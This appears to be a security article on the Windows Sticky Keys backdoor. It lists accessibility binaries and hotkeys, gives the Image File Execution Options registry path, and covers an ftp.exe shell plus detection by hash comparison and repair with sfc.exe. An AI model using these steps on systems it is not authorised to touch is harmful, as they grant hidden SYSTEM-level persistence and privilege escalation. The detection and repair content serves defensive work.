Accessibility Features on Windows can be abused as a privilege escalation or persistence mechanism.
This persistence works by switching out one of the binaries associated with Accessibility Features with
cmd.exe or whatever malware you choose. After the binary is replaced, pressing the sequence of keys required to trigger the feature at the logon screen yields code execution as SYSTEM.
An example is replacing
cmd.exe. At the logon screen, pressing Shift 5 times will spawn
cmd.exe as SYSTEM.
This technique also works over RDP and is a popular backup persistence method used at CTFs and by many threat actors due to its ease of implementation.
In practice, this technique is used to recover lost passwords. With physical access to the system, you can boot up an OS from USB, mount the computer’s physical disk, and make the required alterations. After rebooting the system, trigger the backdoor to get a shell as SYSTEM and use
net.exe to change the user’s password.
|Sticky Keys||sethc.exe||Shift 5 times|
|On-Screen Keyboard||osk.exe||Windows + Control + U|
|Utility Manager||utilman.exe||Windows + U|
|Display Switcher||DisplaySwitch.exe||Windows + P|
|App Switcher||AtBroker.exe||Alt + Tab|
|Magnifier||Magnify.exe||Windows + +|
|Narrator||Narrator.exe||Windows + Control + Enter|
Image File Execution Options
Alternatively, various Image File Execution Options features can be abused to achieve the same type of behavior.
For example, adding a
Debugger value of
sethc.exe‘s key in
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe will also spawn
cmd.exe as SYSTEM when you press Shift five times on the logon screen.
An easy way to determine if this technique has been used on a system is by comparing the hashes of the accessibility features executables with those of known good copies.
An easy way to verify this is by looking up each program’s hash on VirusTotal. If the hash on disk doesn’t match the filename provided by VirusTotal, it has probably been altered.
Some tools check for this technique by matching each accessibility tool against the hashes of
powershell.exe. If any of them are equal to cmd or powershell, this backdoor is likely present.
This is not the best strategy because other LOLBAS utilities such as
ftp.exe can be used as an interactive shell instead of
C:\Users\Daniel>ftp ftp> !whoami domain\daniel ftp> !dir C:\ Volume in drive C is Windows Volume Serial Number is PP5-1-D00D00 Directory of C:\ 09/05/2021 01:39 PM <DIR> Program Files 08/31/2021 05:15 PM <DIR> Program Files (x86) 08/31/2021 05:17 PM <DIR> Tools 08/17/2021 06:31 PM <DIR> Users 08/26/2021 06:31 PM <DIR> Windows 0 File(s) 0 bytes 5 Dir(s) 786,584,748,032 bytes free
Repairing Affected Systems
One way to repair this issue is by using the System File Checker:
sfc.exe is ran against an unaltered file:
PS C:\Windows\system32> sfc /scanfile=C:\windows\system32\sethc.exe Windows Resource Protection did not find any integrity violations.
sfc.exe was able to repair it:
PS C:\Windows\system32> sfc /scanfile=C:\windows\system32\sethc.exe Windows Resource Protection found corrupt files and successfully repaired them. For online repairs, details are included in the CBS log file located at windir\Logs\CBS\CBS.log. For example C:\Windows\Logs\CBS\CBS.log. For offline repairs, details are included in the log file provided by the /OFFLOGFILE flag. The system file repair changes will take effect after the next reboot.
If this doesn’t work, another trick is to look for files with an extension of
.old that may have been created as backups.